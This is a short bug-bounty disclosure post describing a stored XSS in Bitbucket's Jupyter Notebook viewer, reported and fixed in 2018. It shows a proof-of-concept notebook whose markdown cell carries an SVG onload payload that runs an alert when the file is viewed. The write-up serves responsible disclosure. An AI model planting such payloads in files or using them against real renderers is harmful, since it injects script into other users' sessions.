One day, I found that could render Jupyter Notebook on bitbucket.
I have found the Jupyter Notebook(ipynb)’s XSS on GitLab. So, I searched for bitbucket thought that it had a similar vulnerability.
Let me get straight to the point, I found Jupyter Notebook’s XSS just like GitLab.
PoC
ipynb content is JSON, When markdown is specified for cell_type
, HTML renders Markdown text included in source.
The ipynb for such would look something like this.
{
"cells": [
{
"cell_type": "markdown",
"metadata": {},
"source": [
"# This is Markdown Text",
"<svg/onload=alert(document.origin)>"
]
}
],
"metadata": {
"kernelspec": {
"display_name": "Python 3",
"language": "python",
"name": "python3"
},
...
}
}
Push this ipynb file to the repositry, the script was executed just by viewing the ipynb with the Note Viewer.
Bitbucket rewarded me with $600.
Thanks Atlassian! 😎
Timeline
- 2018-07-01 : I found this vulnerability, report to BitBucket
- 2018-07-05 : Report triaged
- 2018-07-11 : Got $600 bounty
- 2018-07-20 : Fixed